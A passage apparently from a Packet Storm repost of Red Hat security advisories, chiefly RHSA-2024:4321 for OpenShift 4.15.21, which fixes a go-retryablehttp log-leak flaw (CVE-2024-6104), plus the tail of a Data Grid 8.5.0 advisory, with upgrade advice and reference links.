includes bug fixes and enhancements. Find out more about Data Grid 8.5.0 in the Release Notes[3].Security Fix(es):* CVE-2024-29180 webpack-dev-middleware: lack of URL validation may lead to file leak [jdg-8] (CVE-2024-29180)* CVE-2024-29025 netty-codec-http: Allocation of Resources Without Limits or Throttling [jdg-8] (CVE-2024-29025)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-29025References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/documentation/en-us/red_hat_data_grid/8.5/html-single/red_hat_data_grid_8.5_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2270863https://bugzilla.redhat.com/show_bug.cgi?id=2272907

Red Hat Security Advisory 2024-4460-03

Red Hat Security Advisory 2024-4321-03 - Red Hat OpenShift Container Platform release 4.15.21 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4321.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.15.21 bug fix and security update  
Advisory ID:        RHSA-2024:4321-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4321  
Issue date:         2024-07-10  
Revision:           03  
CVE Names:          CVE-2024-6104  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.21 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.21. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:4324

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* go-retryablehttp: url might write sensitive information to log file (CVE-2024-6104)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-6104

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://issues.redhat.com/browse/OCPBUGS-27221  
https://issues.redhat.com/browse/OCPBUGS-33619  
https://issues.redhat.com/browse/OCPBUGS-34156  
https://issues.redhat.com/browse/OCPBUGS-34665  
https://issues.redhat.com/browse/OCPBUGS-34912  
https://issues.redhat.com/browse/OCPBUGS-34949  
https://issues.redhat.com/browse/OCPBUGS-35552  
https://issues.redhat.com/browse/OCPBUGS-35736  
https://issues.redhat.com/browse/OCPBUGS-35749  
https://issues.redhat.com/browse/OCPBUGS-35935  
https://issues.redhat.com/browse/OCPBUGS-35988  
https://issues.redhat.com/browse/OCPBUGS-36150  
https://issues.redhat.com/browse/OCPBUGS-36151  
https://issues.redhat.com/browse/OCPBUGS-36225  
https://issues.redhat.com/browse/OCPBUGS-36258  
https://issues.redhat.com/browse/OCPBUGS-36279  
https://issues.redhat.com/browse/OCPBUGS-36287  
https://issues.redhat.com/browse/OCPBUGS-36306  
https://issues.redhat.com/browse/OCPBUGS-36312  
https://issues.redhat.com/browse/OCPBUGS-36374  
https://issues.redhat.com/browse/OCPBUGS-36377

Tag

#web